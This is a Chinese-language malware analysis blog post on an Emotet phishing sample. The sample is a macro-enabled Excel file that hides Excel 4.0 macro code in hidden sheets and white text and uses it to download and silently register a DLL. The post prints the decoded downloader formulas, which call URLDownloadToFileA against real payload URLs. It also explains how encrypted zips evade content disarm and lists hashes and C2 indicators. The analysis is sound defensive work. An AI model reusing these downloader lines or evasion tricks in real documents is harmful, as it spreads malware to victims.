emotet木马病毒家族分析与excel宏表函数

起因

某公司邮服收到大量恶意钓鱼邮件，有员工中招后被拖通讯录，公司内大量邮箱账号密码遭到爆破。

家族背景

Emotet于2014 年被首次发现，最初是作为一种银行木马病毒进行传播，但随着发展逐渐囊括了越来越多的恶意程序，如Trickbot 和 QBot，以及勒索软件Conti、ProLock、Ryuk和 Egregor等，构建成了一个庞大的僵尸网络。

样本分析

样本属性

文件名：VBUQ-2683135.xlsm

文件类型：Microsoft Excel 启用宏的工作表 (.xlsm)

MD5:129114c1b5589116cfa4af9058801b6a

SHA1:0bfff936fcb796e1600805ce789723f51fac6e78

SHA256:83f9bd1734c030f5053d4ab28eba39d91fdf880d1b7bb39b98602912e81ff709

邮件样本

邮件样本如下：

解压后得到excel文件

常见的office文档诱饵，引导受害者点击启用内容加载宏代码，如下图：

攻击方式

此次钓鱼邮件利用手法比较新颖，能够规避一般类型的检测。

垃圾邮件中传播使用zip格式的压缩包中包含OFFICE文档或VBS脚本，这样做可以绕过CDR（内容撤防与重建）技术。在大规模网络钓鱼攻击活动期间，CDR会对进入的文件进行解构，并检查其中是否包含恶意组件。如果包含恶意组件，它会删除这些恶意组件，重新构建一个全新的版本传递给网络上的最终用户。此次样本不会在邮件中直接包含恶意组件，而是将恶意组件进行压缩投递并加密，可以绕过CDR检测技术。

攻击者中放弃使用exe文件以下载后续有效载荷，转而使用dll文件作为后续载荷。本次宏病毒利用了Excel 4.0宏在Excel文档中的存储方式，并结合了字体颜色、工作表隐藏和列隐藏等技巧隐藏Excel 4.0宏代码。详细分析过程如下：

首先攻击者将工作表隐藏，只留下了sheet1作为诱饵图片引诱受害者点击启用内容调用宏代码

先把隐藏的工作表显示出来：

显示隐藏的白色字体：

显示后为攻击者的字典表，其他表会通过excel的拼接调用这张表的字符来组成攻击语句

同样的方法显示其余工作表，可以看到攻击者会去请求以下URL地址

入口函数：

通过拼接Vfrbuk1工作表组成恶意语句

这里的EFALGV表启用了excel 4.0的宏表函数

将列的第一个单元格重命名为Auto_Open，会使整列按顺序执行宏表函数

其中D1的单元格名称就为Auto_Open

宏代码分析

点击启用内容后，自动拼接成如下语句

FORMULA(a,b)是excel4.0宏表函数，意思是把a的值赋值给b

CALL()只在excel宏表上可用，用来调用动态链接库dll文件

最后通过EXEC()函数来执行命令，利用regsvr32.exe调用dll文件（aew.ocx），/s为静默运行

启用内容后：

aew.ocx文件会写入用户目录，之后会把自身拷贝到AppData\Local目录的随机名文件夹下

恶意程序会向注册表写入一条启动项

计算机\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

可执行文件分析

小编对二进制及逆向研究不深此小章可能有许多纰漏，希望师傅们能与我交流指正

没有找到如绿盟（http://blog.nsfocus.net/icedid-bank-trojan-sample-analysis-report/）这篇分析文章有关窃取邮箱的伪代码有熟悉x64dbg、IDA的师傅们可以联系我想学习一下

aew.ocx可执行文件

以下分析这个aew.ocx可执行文件

wininet dll断点

读取浏览器Internet存储的临时文件，历史记录和cookie

断在httpsendRequestW，此时c2 list已经解密成功了，我们从cookie往上翻一点就可以找到

流量分析

单步调试宏表函数

有https的抓不到流量，在复现的时候目标网站均已无法下载ocx文件

=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://shabdsangramnews.com/wp-includes/0EkuXhpisAiyU/","..\aew.ocx",0,0)

=IF(GFGH1<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://newmainghantabazar.com/wp-includes/UOMqB99D/","..\aew.ocx",0,0))

=IF(GFGH2<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://dehraduncabs.com/wp-includes/nQrr0/","..\aew.ocx",0,0))

=IF(GFGH3<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://patriciamirapsicologa.com/wp-includes/OfXgW/","..\aew.ocx",0,0))

=IF(GFGH4<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://vdheuvel.net/gallerijen/MZM66d1KZQI0IjLc/","..\aew.ocx",0,0))

=IF(GFGH5<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://googletopstories.in/wp-admin/css/colors/4Fx/","..\aew.ocx",0,0))

查杀结果

结合云沙箱运行文件和ip域名查询

VT查杀

微步查询域名:shabdsangramnews.com

查询IP:185.168.130.138

aew.ocx查杀结果：

IOCs（失陷指标）

shabdsangramnews.com
newmainghantabazar.com
dehraduncabs.com
patriciamirapsicologa.com
vdheuvel.net
googletopstories.in
168.119.39.118
185.168.130.138
168.197.250.14
195.77.239.39
68.183.93.250
185.184.25.78
118.98.72.86
78.47.204.80
159.69.237.188
61.7.231.226
103.41.204.169
207.148.81.119
85.214.67.203
190.90.233.66
191.252.103.16
93.104.209.107
194.9.172.107
66.42.57.149
59.148.253.194
62.171.178.147
139.196.72.155
198.199.98.78
185.148.168.15
195.154.146.35
104.131.62.48
37.44.244.177
217.182.143.207
54.38.242.185
185.148.168.220
203.153.216.46
87.106.97.83
78.46.73.125
54.37.106.167
37.59.209.141
54.37.228.122
61.7.231.229
45.71.195.104
116.124.128.206
128.199.192.135
210.57.209.142